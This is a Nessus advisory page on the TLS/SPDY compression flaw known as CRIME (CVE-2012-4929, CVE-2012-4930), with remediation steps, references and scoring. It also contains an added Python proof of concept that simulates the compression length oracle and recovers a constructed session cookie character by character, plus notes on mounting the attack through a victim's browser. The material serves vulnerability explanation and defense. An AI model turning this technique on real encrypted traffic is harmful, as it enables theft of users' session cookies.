Transport Layer Security (TLS) Protocol CRIME Vulnerability

Low Nessus Plugin ID 62565

Synopsis

The remote service has a configuration that may make it vulnerable to the CRIME attack.

Description

The remote service has at least one of two configurations that are known to be required for the CRIME attack. CRIME recovers a secret such as a session cookie by injecting chosen plaintext (for example a request path) next to it and observing how much the compressed, encrypted record shrinks when the injected text matches the secret; either configuration below supplies that compression:

- SSL / TLS compression (for example DEFLATE, RFC 3749) is enabled (CVE-2012-4929).

- TLS advertises, via the Next Protocol Negotiation (NPN) extension, a SPDY protocol earlier than version 4; SPDY/2 and SPDY/3 compress HTTP headers with zlib in one shared context (CVE-2012-4930).

Note that Nessus did not attempt to launch the CRIME attack against the remote service.
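The following Python script is an added, self-contained simulation of the side channel those two configurations expose; it is not part of the Nessus plugin or of Tenable's page. It compresses a constructed HTTP request whose path the attacker controls and whose Cookie header carries a constructed secret, then recovers the secret one character at a time from nothing but the compressed length, which is what an attacker sees as the TLS record (or SPDY frame) size on the wire. The hostname, cookie name and secret are made up. zlib's fixed-Huffman strategy is used so the length oracle is exact and deterministic; real stacks use dynamic Huffman tables, where the same attack works but needs more probes per character.

```python
"""
CRIME side-channel simulation (constructed example; not Nessus plugin code).

The "victim" compresses an HTTP request in which the attacker controls the
URL path but not the Cookie header. Because both share one DEFLATE context,
a path that repeats the cookie prefix plus a correct guess for the next
secret character compresses slightly better than any wrong guess. The only
thing the attacker observes is the compressed length.
"""
import string
import zlib

# Constructed secret: 16 distinct alphanumerics, so no 3-byte substring of
# the cookie can accidentally match anywhere else in the request.
SECRET_TOKEN = b"Zq2Lp9vXbT0KmN3w"
COOKIE_PREFIX = b"Cookie: sessionid="
ALPHABET = (string.ascii_letters + string.digits).encode()

# Fixed Huffman codes (zlib strategy Z_FIXED, value 4 in zlib.h) make the
# length oracle exact. Real stacks use dynamic Huffman tables, where the same
# attack works but needs more probes per character to average out noise.
_STRATEGY = getattr(zlib, "Z_FIXED", 4)


def deflate_length(data: bytes) -> int:
    """Length in bytes of a raw DEFLATE stream for data."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15, 8, _STRATEGY)
    return len(comp.compress(data) + comp.flush())


def victim_record_length(attacker_path: bytes) -> int:
    """Oracle: compressed size of a request carrying the attacker's path
    and the victim's secret cookie (hostname and header set are made up)."""
    request = (b"GET /?" + attacker_path + b" HTTP/1.1\r\n"
               b"Host: app.example\r\n"
               + COOKIE_PREFIX + SECRET_TOKEN + b"\r\n\r\n")
    return deflate_length(request)


def probe_score(known: bytes, guess: int) -> int:
    """Sum of oracle answers over eight paddings.

    A correct guess saves 7 or 8 bits, which a byte-granular length hides
    about one time in eight. Each padding byte here is >= 0x90 and therefore
    costs 9 bits under fixed Huffman codes, so eight padding lengths walk the
    output through every bit alignment and the saving shows as a strictly
    smaller sum. Padding bytes are distinct, so they never form a match.
    """
    total = 0
    for n in range(8):
        padding = bytes(range(0xC0, 0xC0 + n))
        total += victim_record_length(
            padding + COOKIE_PREFIX + known + bytes([guess]))
    return total


def recover_secret(max_len: int = 16) -> bytes:
    """Recover the cookie value character by character using only lengths.
    Stops early if a position is ambiguous instead of guessing."""
    known = b""
    for _ in range(max_len):
        scores = {g: probe_score(known, g) for g in ALPHABET}
        best = min(scores.values())
        winners = [g for g, s in scores.items() if s == best]
        if len(winners) != 1:
            break
        known += bytes(winners)
    return known


if __name__ == "__main__":
    recovered = recover_secret()
    print("recovered:", recovered.decode())
    print("match:", recovered == SECRET_TOKEN)
```

Each position costs 62 candidates times 8 probes, so the whole 16-character token falls to under 8,000 oracle queries; against a real browser the queries are cross-origin requests the attacker's page makes the victim's browser send, and the oracle is the length of the encrypted records captured on the network. The same logic applies to SPDY/2 and SPDY/3, where the attacker-controlled header and the Cookie header share one zlib stream.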

Solution

Disable SSL / TLS compression (Apache httpd mod_ssl: SSLCompression off; OpenSSL-based servers can set the SSL_OP_NO_COMPRESSION option, and recent OpenSSL releases disable compression by default) and stop offering SPDY versions earlier than 4, for example by disabling the SPDY module or moving to HTTP/2, whose HPACK header compression was designed to resist this attack. A quick check is openssl s_client -connect host:443, whose session summary should read Compression: NONE. Since Nessus only inspects the configuration and does not run the attack, re-scan after the change to confirm the finding clears.

See Also

https://www.iacr.org/cryptodb/data/paper.php?pubkey=3091

https://discussions.nessus.org/thread/5546

http://www.nessus.org/u?c44d5826

https://bz.apache.org/bugzilla/show_bug.cgi?id=53219

Plugin Details

Severity: Low

ID: 62565

File Name: ssl_crime.nasl

Version: 1.14

Type: remote

Family: General

Published: 2012/10/16

Updated: 2019/12/04

Dependencies: 62563, 62564

Risk Information

Risk Factor: Low

VPR Score: 5.9

CVSS Score Source: CVE-2012-4930

CVSS v2.0

Base Score: 2.6

Temporal Score: 1.9

Vector: CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N

Temporal Vector: CVSS2#E:U/RL:OF/RC:C

Vulnerability Information

Required KB Items: SSL/Supported

Exploit Available: false

Exploit Ease: No known exploits are available

Vulnerability Publication Date: 2012/09/15

Reference Information

CVE: CVE-2012-4929, CVE-2012-4930

BID: 55704, 55707